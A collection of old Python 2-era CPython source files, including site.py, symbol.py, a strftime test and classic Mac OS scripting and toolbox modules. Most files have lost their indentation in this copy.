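# 887383800 seconds since the epoch (assumed date; relies on time.mktime
# and time.timezone agreeing with each other).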
# When used as script, run a small test program.
# The first command line argument must be a filename containing one
# message in RFC-822 format.
if __name__ == '__main__':
import sys, os
file = os.path.join(os.environ['HOME'], 'Mail/inbox/1')
if sys.argv[1:]: file = sys.argv[1]
f = open(file, 'r')
m = Message(f)
print 'From:', m.getaddr('from')
print 'To:', m.getaddrlist('to')
print 'Subject:', m.getheader('subject')
print 'Date:', m.getheader('date')
date = m.getdate_tz('date')
if date:
print 'ParsedDate:', time.asctime(date[:-1]),
hhmmss = date[-1]
hhmm, ss = divmod(hhmmss, 60)
hh, mm = divmod(hhmm, 60)
print "%+03d%02d" % (hh, mm),
if ss: print ".%02d" % ss,
print
else:
print 'ParsedDate:', None
m.rewindbody()
n = 0
while f.readline():
n = n + 1
print 'Lines:', n
print '-'*70
print 'len =', len(m)
if m.has_key('Date'): print 'Date =', m['Date']
if m.has_key('X-Nonsense'): pass
print 'keys =', m.keys()
print 'values =', m.values()
print 'items =', m.items()
```
#### File: cpython/Lib/site.py
```python
import sys, os
def addsitedir(sitedir):
if sitedir not in sys.path:
sys.path.append(sitedir) # Add path component
try:
names = os.listdir(sitedir)
except os.error:
return
names = map(os.path.normcase, names)
names.sort()
for name in names:
if name[-4:] == ".pth":
addpackage(sitedir, name)
def addpackage(sitedir, name):
fullname = os.path.join(sitedir, name)
try:
f = open(fullname)
except IOError:
return
while 1:
dir = f.readline()
if not dir:
break
if dir[0] == '#':
continue
if dir[-1] == '\n':
dir = dir[:-1]
dir = os.path.join(sitedir, dir)
if dir not in sys.path and os.path.exists(dir):
sys.path.append(dir)
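# Sketch of the .pth mechanism (hypothetical layout): a file "mypkg.pth" in a
# site directory whose single line reads
#   mypkg
# makes addpackage() append os.path.join(sitedir, 'mypkg') to sys.path,
# provided that directory exists.  Lines starting with '#' are skipped.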
prefixes = [sys.prefix]
if sys.exec_prefix != sys.prefix:
prefixes.append(sys.exec_prefix)
for prefix in prefixes:
if prefix:
if os.sep == '/':
sitedirs = [os.path.join(prefix,
"lib",
"python" + sys.version[:3],
"site-packages"),
os.path.join(prefix, "lib", "site-python")]
else:
sitedirs = [prefix]
for sitedir in sitedirs:
if os.path.isdir(sitedir):
addsitedir(sitedir)
# Define new built-ins 'quit' and 'exit'.
# These are simply strings that display a hint on how to exit.
if os.sep == ':':
exit = 'Use Cmd-Q to quit.'
elif os.sep == '\\':
exit = 'Use Ctrl-Z plus Return to exit.'
else:
exit = 'Use Ctrl-D (i.e. EOF) to exit.'
import __builtin__
__builtin__.quit = __builtin__.exit = exit
del exit
try:
import sitecustomize # Run arbitrary site specific code
except ImportError:
pass # No site customization module
def _test():
print "sys.path = ["
for dir in sys.path:
print " %s," % `dir`
print "]"
if __name__ == '__main__':
_test()
```
#### File: cpython/Lib/symbol.py
```python
single_input = 256
file_input = 257
eval_input = 258
funcdef = 259
parameters = 260
varargslist = 261
fpdef = 262
fplist = 263
stmt = 264
simple_stmt = 265
small_stmt = 266
expr_stmt = 267
print_stmt = 268
del_stmt = 269
pass_stmt = 270
flow_stmt = 271
break_stmt = 272
continue_stmt = 273
return_stmt = 274
raise_stmt = 275
import_stmt = 276
dotted_name = 277
global_stmt = 278
exec_stmt = 279
assert_stmt = 280
compound_stmt = 281
if_stmt = 282
while_stmt = 283
for_stmt = 284
try_stmt = 285
except_clause = 286
suite = 287
test = 288
and_test = 289
not_test = 290
comparison = 291
comp_op = 292
expr = 293
xor_expr = 294
and_expr = 295
shift_expr = 296
arith_expr = 297
term = 298
factor = 299
power = 300
atom = 301
lambdef = 302
trailer = 303
subscriptlist = 304
subscript = 305
sliceop = 306
exprlist = 307
testlist = 308
dictmaker = 309
classdef = 310
arglist = 311
argument = 312
#--end constants--
sym_name = {}
for _name, _value in globals().items():
if type(_value) is type(0):
sym_name[_value] = _name
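# Example: sym_name inverts the table above, mapping numbers back to names:
#   >>> sym_name[file_input]
#   'file_input'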
def main():
import sys
import token
if len(sys.argv) == 1:
sys.argv = sys.argv + ["Include/graminit.h", "Lib/symbol.py"]
token.main()
if __name__ == "__main__":
main()
```
#### File: Lib/test/test_strftime.py
```python
import time, calendar, sys, string, os, re
from test_support import verbose
def main():
global verbose
now = time.time()
strftest(now)
verbose = 0
# Try a bunch of dates and times, chosen to vary through time of
# day and daylight saving time
for j in range(-5, 5):
for i in range(25):
strftest(now + (i + j*100)*23*3603)
def strftest(now):
if verbose:
print "strftime test for", time.ctime(now)
nowsecs = str(long(now))[:-1]
gmt = time.gmtime(now)
now = time.localtime(now)
if now[3] < 12: ampm='AM'
else: ampm='PM'
jan1 = time.localtime(time.mktime((now[0], 1, 1) + (0,)*6))
try:
if now[8]: tz = time.tzname[1]
else: tz = time.tzname[0]
except AttributeError:
tz = ''
if now[3] > 12: clock12 = now[3] - 12
elif now[3] > 0: clock12 = now[3]
else: clock12 = 12
expectations = (
('%a', calendar.day_abbr[now[6]], 'abbreviated weekday name'),
('%A', calendar.day_name[now[6]], 'full weekday name'),
('%b', calendar.month_abbr[now[1]], 'abbreviated month name'),
('%B', calendar.month_name[now[1]], 'full month name'),
# %c see below
('%d', '%02d' % now[2], 'day of month as number (00-31)'),
('%H', '%02d' % now[3], 'hour (00-23)'),
('%I', '%02d' % clock12, 'hour (01-12)'),
('%j', '%03d' % now[7], 'julian day (001-366)'),
('%m', '%02d' % now[1], 'month as number (01-12)'),
('%M', '%02d' % now[4], 'minute, (00-59)'),
('%p', ampm, 'AM or PM as appropriate'),
('%S', '%02d' % now[5], 'seconds of current time (00-60)'),
('%U', '%02d' % ((now[7] + jan1[6])/7),
'week number of the year (Sun 1st)'),
('%w', '0?%d' % ((1+now[6]) % 7), 'weekday as a number (Sun 1st)'),
('%W', '%02d' % ((now[7] + (jan1[6] - 1)%7)/7),
'week number of the year (Mon 1st)'),
# %x see below
('%X', '%02d:%02d:%02d' % (now[3], now[4], now[5]), '%H:%M:%S'),
('%y', '%02d' % (now[0]%100), 'year without century'),
('%Y', '%d' % now[0], 'year with century'),
# %Z see below
('%%', '%', 'single percent sign'),
)
nonstandard_expectations = (
# These are standard but don't have predictable output
('%c', fixasctime(time.asctime(now)), 'near-asctime() format'),
('%x', '%02d/%02d/%02d' % (now[1], now[2], (now[0]%100)),
'%m/%d/%y %H:%M:%S'),
('%Z', '%s' % tz, 'time zone name'),
# These are some platform specific extensions
('%D', '%02d/%02d/%02d' % (now[1], now[2], (now[0]%100)), 'mm/dd/yy'),
('%e', '%2d' % now[2], 'day of month as number, blank padded ( 0-31)'),
('%h', calendar.month_abbr[now[1]], 'abbreviated month name'),
('%k', '%2d' % now[3], 'hour, blank padded ( 0-23)'),
('%n', '\n', 'newline character'),
('%r', '%02d:%02d:%02d %s' % (clock12, now[4], now[5], ampm),
'%I:%M:%S %p'),
('%R', '%02d:%02d' % (now[3], now[4]), '%H:%M'),
('%s', nowsecs, 'seconds since the Epoch in UCT'),
('%t', '\t', 'tab character'),
('%T', '%02d:%02d:%02d' % (now[3], now[4], now[5]), '%H:%M:%S'),
('%3y', '%03d' % (now[0]%100),
'year without century rendered using fieldwidth'),
)
if verbose:
print "Strftime test, platform: %s, Python version: %s" % \
(sys.platform, string.split(sys.version)[0])
for e in expectations:
try:
result = time.strftime(e[0], now)
except ValueError, error:
print "Standard '%s' format gave error:" % e[0], error
continue
if re.match(e[1], result): continue
if not result or result[0] == '%':
print "Does not support standard '%s' format (%s)" % (e[0], e[2])
else:
print "Conflict for %s (%s):" % (e[0], e[2])
print " Expected %s, but got %s" % (e[1], result)
for e in nonstandard_expectations:
try:
result = time.strftime(e[0], now)
except ValueError, result:
if verbose:
print "Error for nonstandard '%s' format (%s): %s" % \
(e[0], e[2], str(result))
continue
if re.match(e[1], result):
if verbose:
print "Supports nonstandard '%s' format (%s)" % (e[0], e[2])
elif not result or result[0] == '%':
if verbose:
print "Does not appear to support '%s' format (%s)" % (e[0],
e[2])
else:
if verbose:
print "Conflict for nonstandard '%s' format (%s):" % (e[0],
e[2])
print " Expected %s, but got %s" % (e[1], result)
def fixasctime(s):
if s[8] == ' ':
s = s[:8] + '0' + s[9:]
return s
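# Example: pads asctime()'s blank-padded day of month with a zero, so
# 'Sun Feb  6 01:02:03 1994' becomes 'Sun Feb 06 01:02:03 1994', to match
# strftime's %c output.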
main()
```
#### File: Lib/test/test_sunaudiodev.py
```python
from test_support import verbose, findfile, TestFailed
import sunaudiodev
import os
def play_sound_file(path):
fp = open(path, 'r')
data = fp.read()
fp.close()
try:
a = sunaudiodev.open('w')
except sunaudiodev.error, msg:
raise TestFailed, msg
else:
a.write(data)
a.close()
def test():
play_sound_file(findfile('audiotest.au'))
test()
```
#### File: Contrib/PythonScript/getaete.py
```python
import baetools
import macpath
import sys
import os
import MacOS
import StringIO
import types
from MACFS import *
import macfs
import string
from Res import *
import struct
# for testing only
app ='CSOm' #'ezVu'# 'nwSP'#MACS'#
#Restrict the application suites to the dialect we want to use.
LANG = 0 # 0 = English, 1 = French, 11 = Japanese
lang = {0:'English', 1:'French', 11:'Japanese'}
#The following are needed to open the application aete
kASAppleScriptSuite = 'ascr'
kGetAETE = 'gdte'
attributes = {}
arguments = {}
class AETE(baetools.TalkTo):
pass
def Getaete(app):
try:
data = openaete(app)
except MacOS.Error, msg:
if msg[0] == -609:
_launch(app)
data = openaete(app)
data = decode(data['----'].data)
data = compileaete(data)
return data
def decode(data):
"""Decode an aete into a python data structure"""
f = StringIO.StringIO(data)
aete = generic(getaete, f)
return aete
def simplify(item):
"""Recursively replace singleton tuples by their constituent item"""
if type(item) is types.ListType:
return map(simplify, item)
elif type(item) == types.TupleType and len(item) == 2:
return simplify(item[1])
else:
return item
## Here follows the aete resource decoder.
## It is presented bottom-up instead of top-down because there are direct
## references to the lower-level part-decoders from the high-level part-decoders.
#
def getflag(f, *args):
    m = ''
    c = f.read(2)
    if not c:
        raise EOFError, 'in getflag' + str(args)
    for n in c:
        m = m + `ord(n)`
    return m
def getbyte(f, *args):
c = f.read(1)
if not c:
raise EOFError, 'in getbyte' + str(args)
return ord(c)
def getword(f, *args):
getalign(f)
s = f.read(2)
if len(s) < 2:
raise EOFError, 'in getword' + str(args)
return (ord(s[0])<<8) | ord(s[1])
def getlong(f, *args):
getalign(f)
s = f.read(4)
if len(s) < 4:
raise EOFError, 'in getlong' + str(args)
return (ord(s[0])<<24) | (ord(s[1])<<16) | (ord(s[2])<<8) | ord(s[3])
def getostype(f, *args):
getalign(f)
s = f.read(4)
if len(s) < 4:
raise EOFError, 'in getostype' + str(args)
return s
def getpstr(f, *args):
c = f.read(1)
if len(c) < 1:
raise EOFError, 'in getpstr[1]' + str(args)
nbytes = ord(c)
if nbytes == 0: return ''
s = f.read(nbytes)
if len(s) < nbytes:
raise EOFError, 'in getpstr[2]' + str(args)
return s
def getalign(f):
if f.tell() & 1:
c = f.read(1)
##if c <> '\0':
## print 'align:', `c`
def getlist(f, description, getitem):
count = getword(f)
list = []
for i in range(count):
list.append(generic(getitem, f))
getalign(f)
return list
def alt_generic(what, f, *args):
    print "generic", `what`, args
    res = apply(generic, (what, f) + args)
    print '->', `res`
    return res
def generic(what, f, *args):
if type(what) == types.FunctionType:
return apply(what, (f,) + args)
if type(what) == types.ListType:
record = []
for thing in what:
item = apply(generic, thing[:1] + (f,) + thing[1:])
record.append(item)
return record
return "BAD GENERIC ARGS: %s" % `what`
getdata = [
(getostype, "type"),
(getpstr, "description"),
(getword, "flags")
]
getargument = [
(getpstr, "name"),
(getostype, "keyword"),
(getdata, "what")
]
getevent = [
(getpstr, "name"),
(getpstr, "description"),
(getostype, "suite code"),
(getostype, "event code"),
(getdata, "returns"),
(getdata, "accepts"),
(getlist, "optional arguments", getargument)
]
getproperty = [
(getpstr, "name"),
(getostype, "code"),
(getdata, "what")
]
getelement = [
(getostype, "type"),
(getlist, "keyform", getostype)
]
getclass = [
(getpstr, "name"),
(getostype, "class code"),
(getpstr, "description"),
(getlist, "properties", getproperty),
(getlist, "elements", getelement)
]
getcomparison = [
(getpstr, "operator name"),
(getostype, "operator ID"),
(getpstr, "operator comment"),
]
getenumerator = [
(getpstr, "enumerator name"),
(getostype, "enumerator ID"),
(getpstr, "enumerator comment")
]
getenumeration = [
(getostype, "enumeration ID"),
(getlist, "enumerator", getenumerator)
]
getsuite = [
(getpstr, "suite name"),
(getpstr, "suite description"),
(getostype, "suite ID"),
(getword, "suite level"),
(getword, "suite version"),
(getlist, "events", getevent),
(getlist, "classes", getclass),
(getlist, "comparisons", getcomparison),
(getlist, "enumerations", getenumeration)
]
getaete = [
(getbyte, "major version in BCD"),
(getbyte, "minor version in BCD"),
(getword, "language code"),
(getword, "script code"),
(getlist, "suites", getsuite)
]
def compileaete(aete):
"""Generate dictionary for a full aete resource."""
[major, minor, language, script, suites] = aete
suitedict = {}
gsuites = openaeut()
for gsuite in gsuites:
if gsuite[0] == 'AppleScript Suite':
suite = gsuite
suite = compilesuite(suite)
suitedict[identify(suite[0])] = suite[1:]
for suite in suites:
if language == LANG:
suitecode = suite[2]
if suite[5] == []:
for gsuite in gsuites:
if suitecode == gsuite[2]:
suite = gsuite
suite = compilesuite(suite)
suitedict[identify(suite[0])] = suite[1:]
suitedict = combinesuite(suitedict)
return suitedict
def compilesuite(suite):
"""Generate dictionary for a single suite"""
[name, desc, code, level, version, events, classes, comps, enums] = suite
eventdict ={}
classdict = {}
enumdict ={}
for event in events:
if event[6]:
for ev in event[6]:
ev[0] = identify(ev[:2])
eventdict[identify(event[:2])] = event[1:]
for klass in classes:
if klass[3]:
for kl in klass[3]:
kl[0] = identify(kl[:2])
classdict[identify(klass[:2])] = klass[1:]
for enum in enums:
enumdict[enum[0]] = enum[1]
return name, eventdict, classdict, enumdict
def combinesuite(suite):
"""Combines suite dictionaries to seperate event, class, enumeration dictionaries
"""
suitelist = []
eventDict ={}
classDict ={}
enumDict ={}
for value in suite.values():
for key in value[0].keys():
val = value[0][key]
eventDict[key] = val
for key in value[1].keys():
val = value[1][key]
if key in classDict.keys():
nval = classDict[key][2]
val[2] = val[2] + nval
classDict[key] = val
for key in value[2].keys():
val = value[2][key]
enumDict[key] = val
return eventDict, classDict, enumDict
illegal_ids = [ "for", "in", "from", "and", "or", "not", "print", "class", "return",
"def", "name", 'data' ]
def identify(str):
"""Turn any string into an identifier:
- replace space by _
- remove ',' and '-'
capitalise
"""
if not str[0]:
if str[1] == 'c@#!':
return "Every"
else:
return 'Any'
rv = string.replace(str[0], ' ', '_')
rv = string.replace(rv, '-', '')
rv = string.replace(rv, ',', '')
rv = string.capitalize(rv)
return rv
def openaete(app):
"""open and read the aete of the target application"""
arguments['----'] = LANG
_aete = AETE(app)
_reply, _arguments, _attributes = _aete.send(kASAppleScriptSuite, kGetAETE, arguments, attributes)
if _arguments.has_key('errn'):
raise baetools.Error, baetools.decodeerror(_arguments)
return _arguments
def openaeut():
"""Open and read a aeut file.
XXXXX This has been temporarily hard coded until a Python aeut is written XXXX"""
fullname = dialect
rf = OpenRFPerm(fullname, 0, 1)
try:
UseResFile(rf)
resources = []
for i in range(Count1Resources('aeut')):
res = Get1IndResource('aeut', 1+i)
resources.append(res)
for res in resources:
data = res.data
data = decode(data)[4]
finally:
CloseResFile(rf)
return data
def dialect():
"""find the correct Dialect file"""
dialect = lang[LANG] + " Dialect"
try:
##System 8
vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kScriptingAdditionsFolderType, 0)
fss = macfs.FSSpec((vRefNum, dirID, ''))
fss = fss.as_pathname()
except macfs.error:
        ##System 7
vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kExtensionFolderType, 0)
fss = macfs.FSSpec((vRefNum, dirID, ''))
fss = fss.as_pathname()
fss = macpath.join(fss, "Scripting Additions")
fss = macpath.join(fss, "Dialect")
fss = macpath.join(fss, dialect)
return fss
#def openosax():
# """Open and read the aetes of osaxen in the scripting additions folder"""
#
# # System 7.x
# aete = []
# vRefNum, dirID = macfs.FindFolder(kOnSystemDisk, kExtensionFolderType, 0)
# fss = macfs.FSSpec((vRefNum, dirID, ''))
# fss = fss.as_pathname()
# osax = macpath.join(fss, "Scripting Additions")
# for file in os.listdir(osax):
# fullname = macpath.join(osax, file)
# print fullname
# rf = OpenRFPerm(fullname, 0, 1)
# try:
# UseResFile(rf)
# resources = []
# for i in range(Count1Resources('aete')):
# res = Get1IndResource('aete', 1+i)
# resources.append(res)
# for res in resources:
# data = res.data
# data = decode(data)[4]
# finally:
# CloseResFile(rf)
# aete.append(data)
# print data
#The following should be replaced by direct access to a python 'aeut'
def _launch(appfile):
"""Open a file thru the finder. Specify file by name or fsspec"""
# from PythonScript import PyScript
import baetypes
_finder = AETE('MACS')
parameters ={}
parameters['----'] = eval("baetypes.ObjectSpecifier('%s', '%s', %s)" % ('appf', 'ID ', `appfile`))
_reply, _arguments, _attributes = _finder.send( 'aevt', 'odoc', parameters , attributes = {})
if _arguments.has_key('errn'):
raise baetools.Error, baetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
if __name__ == '__main__':
# import profile
# profile.run('Getaete(app)', 'Getaeteprof')
Getaete(app)
# openosax()
# openaete('ascr')
# sys.exit(1)
```
#### File: Demo/cgi/realcgitest.py
```python
from MiniAEFrame import AEServer, MiniApplication
import MacOS
class CGITest(AEServer, MiniApplication):
def __init__(self):
MiniApplication.__init__(self)
AEServer.__init__(self)
self.installaehandler('aevt', 'oapp', self.open_app)
self.installaehandler('aevt', 'quit', self.quit)
self.installaehandler('WWW\275', 'sdoc', self.cgihandler)
oldparams = MacOS.SchedParams(0, 0)
self.mainloop()
apply(MacOS.SchedParams, oldparams)
def quit(self, **args):
self.quitting = 1
def open_app(self, **args):
pass
def cgihandler(self, pathargs, **args):
rv = """HTTP/1.0 200 OK
Server: NetPresenz; python-cgi-script
MIME-Version: 1.0
Content-type: text/html
<title>Python CGI-script results</title>
<h1>Python CGI-script results</h1>
<hr>
"""
rv = rv+'<br><b>Direct object:</b> %s\n'%pathargs
for key in args.keys():
if key[0] != '_':
rv = rv + '<br><b>%s:</b> %s\n'%(key, args[key])
rv = rv +'<hr>\nSee you next time!\n'
# Note: if you want to quit after each request enable the line
# self.quitting = 1
return rv
if __name__ == '__main__':
CGITest()
```
#### File: Demo/printing/PrintingDemo.py
```python
import Printing
import Qd
import Fm
import Res
# some constants
PostScriptBegin = 190 # Set driver state to PostScript
PostScriptEnd = 191 # Restore QuickDraw state
PostScriptHandle = 192 # PostScript data referenced in handle
CHUNK_SIZE = 0x8000 # max size of PicComment
def PostScript(text):
"""embed text as plain PostScript in print job."""
handle = Res.Resource('')
Qd.PicComment(PostScriptBegin, 0, handle)
while text:
chunk = text[:CHUNK_SIZE]
text = text[CHUNK_SIZE:]
handle.data = chunk
Qd.PicComment(PostScriptHandle, len(chunk), handle)
handle.data = ''
Qd.PicComment(PostScriptEnd, 0, handle)
# create a new print record
printrecord = Printing.NewTPrintRecord()
# open the printer
Printing.PrOpen()
try:
# initialize print record with default values
Printing.PrintDefault(printrecord)
# page setup, ok is 0 when user cancelled
ok = Printing.PrStlDialog(printrecord)
if not ok:
raise KeyboardInterrupt
# at this stage, you should save the print record in your document for later
# reference.
# print job dialog, ok is 0 when user cancelled
ok = Printing.PrJobDialog(printrecord)
if not ok:
raise KeyboardInterrupt
# once per document
port = Printing.PrOpenDoc(printrecord)
# port is the Printer's GrafPort, it is also the current port, so no need to Qd.SetPort(port)
try:
# start printing a page
# XXX should really look up what pages to print by
# inspecting the print record.
Printing.PrOpenPage(port, None)
try:
# use QuickDraw like in any other GrafPort
Qd.FrameRect((10, 250, 100, 500))
Qd.FrameRect((10, 510, 100, 600))
Qd.MoveTo(10, 100)
Qd.TextSize(50)
Qd.TextFont(Fm.GetFNum("Helvetica"))
Qd.DrawString("It rreally works!")
Qd.MoveTo(10, 150)
Qd.TextSize(20)
Qd.DrawString("(and now for a little PostScript...)")
# example PostScript code
ps = """
% the coordinate system is the quickdraw one, which is flipped
% compared to the default PS one. That means text will appear
% flipped when used directly from PostScript.
% As an example we start by defining a custom scalefont operator
% that corrects this.
/myscalefont{[exch 0 0 2 index neg 0 0]makefont}def
0.75 setgray
0 0 moveto
0 30 lineto 10000 30 lineto
10000 0 lineto closepath fill
0 setgray
5 25 moveto /Courier findfont 20 myscalefont setfont
(Printed with PostScript!) show
2 setlinewidth [10 10 5 10] 0 setdash 5 5 moveto 400 0 rlineto stroke
"""
# embed the PostScript code in the print job
PostScript(ps)
finally:
# when done with the page
Printing.PrClosePage(port)
finally:
# when done with the document
Printing.PrCloseDoc(port)
finally:
# when done printing
Printing.PrClose()
```
#### File: Lib/lib-scripting/Finder_7_0_Suite.py
```python
import aetools
import MacOS
_code = 'FNDR'
class Finder_7_0_Suite:
def open_about_box(self, _no_object=None, _attributes={}, **_arguments):
"""open about box: Open the 'About This Mac' window
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'aevt'
_subcode = 'abou'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_copy_to = {
'_from' : 'fsel',
}
def copy_to(self, _object, _attributes={}, **_arguments):
"""copy to: Copies one or more items into a folder
Required argument: Alias for folder into which the items are copied
Keyword argument _from: List of aliases for items to be copied
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'drag'
aetools.keysubst(_arguments, self._argmap_copy_to)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_duplicate = {
'items' : 'fsel',
}
def duplicate(self, _object, _attributes={}, **_arguments):
"""duplicate: Duplicate a set of items in a folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in the folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sdup'
aetools.keysubst(_arguments, self._argmap_duplicate)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def empty_trash(self, _no_object=None, _attributes={}, **_arguments):
"""empty trash: Empties the trash
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'empt'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_make_aliases_for = {
'items' : 'fsel',
}
def make_aliases_for(self, _object, _attributes={}, **_arguments):
"""make aliases for: Make aliases to items from a single folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sali'
aetools.keysubst(_arguments, self._argmap_make_aliases_for)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_move_to = {
'_from' : 'fsel',
}
def move_to(self, _object, _attributes={}, **_arguments):
"""move to: Move one or more items into a folder
Required argument: Alias for destination folder
Keyword argument _from: List of aliases for items to be moved
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'move'
aetools.keysubst(_arguments, self._argmap_move_to)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def sleep(self, _no_object=None, _attributes={}, **_arguments):
"""sleep: Put portable into sleep mode
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'slep'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def shut_down(self, _no_object=None, _attributes={}, **_arguments):
"""shut down: Shuts down the Macintosh if all applications can quit
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'shut'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_open = {
'items' : 'fsel',
}
def open(self, _object, _attributes={}, **_arguments):
"""open: Open folders, files, or applications from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in the folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'sope'
aetools.keysubst(_arguments, self._argmap_open)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap__print = {
'items' : 'fsel',
}
def _print(self, _object, _attributes={}, **_arguments):
"""print: Print items from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'spri'
aetools.keysubst(_arguments, self._argmap__print)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_put_away = {
'items' : 'fsel',
}
def put_away(self, _object, _attributes={}, **_arguments):
"""put away: Put away items from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases to items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: undocumented, typecode 'alis'
"""
_code = 'FNDR'
_subcode = 'sput'
aetools.keysubst(_arguments, self._argmap_put_away)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def restart(self, _no_object=None, _attributes={}, **_arguments):
"""restart: Restart the Macintosh
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'rest'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_select = {
'items' : 'fsel',
}
def select(self, _object, _attributes={}, **_arguments):
"""select: Select items in a folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'srev'
aetools.keysubst(_arguments, self._argmap_select)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
#
# Indices of types declared in this module
#
_classdeclarations = {
}
_propdeclarations = {
}
_compdeclarations = {
}
_enumdeclarations = {
}
```
#### File: Lib/lib-toolbox/Lists.py
```python
def FOUR_CHAR_CODE(x): return x
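# FOUR_CHAR_CODE is the identity function here: OSType constants are kept
# as their four-character strings, e.g. listNotifyClick == 'clik'.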
listNotifyNothing = FOUR_CHAR_CODE('nada')
listNotifyClick = FOUR_CHAR_CODE('clik')
listNotifyDoubleClick = FOUR_CHAR_CODE('dblc')
listNotifyPreClick = FOUR_CHAR_CODE('pclk')
lDoVAutoscrollBit = 1
lDoHAutoscrollBit = 0
lDoVAutoscroll = 2
lDoHAutoscroll = 1
lOnlyOneBit = 7
lExtendDragBit = 6
lNoDisjointBit = 5
lNoExtendBit = 4
lNoRectBit = 3
lUseSenseBit = 2
lNoNilHiliteBit = 1
lOnlyOne = -128
lExtendDrag = 64
lNoDisjoint = 32
lNoExtend = 16
lNoRect = 8
lUseSense = 4
lNoNilHilite = 2
lInitMsg = 0
lDrawMsg = 1
lHiliteMsg = 2
lCloseMsg = 3
```
#### File: Lib/lib-toolbox/Menus.py
```python
def FOUR_CHAR_CODE(x): return x
kMenuStdMenuProc = 63
kMenuStdMenuBarProc = 63
kMenuNoModifiers = 0
kMenuNoIcon = 0
kMenuIconType = 1
kMenuShrinkIconType = 2
kMenuSmallIconType = 3
kMenuColorIconType = 4
kMenuIconSuiteType = 5
kMenuIconRefType = 6
noMark = 0
kMenuDrawMsg = 0
kMenuChooseMsg = 1
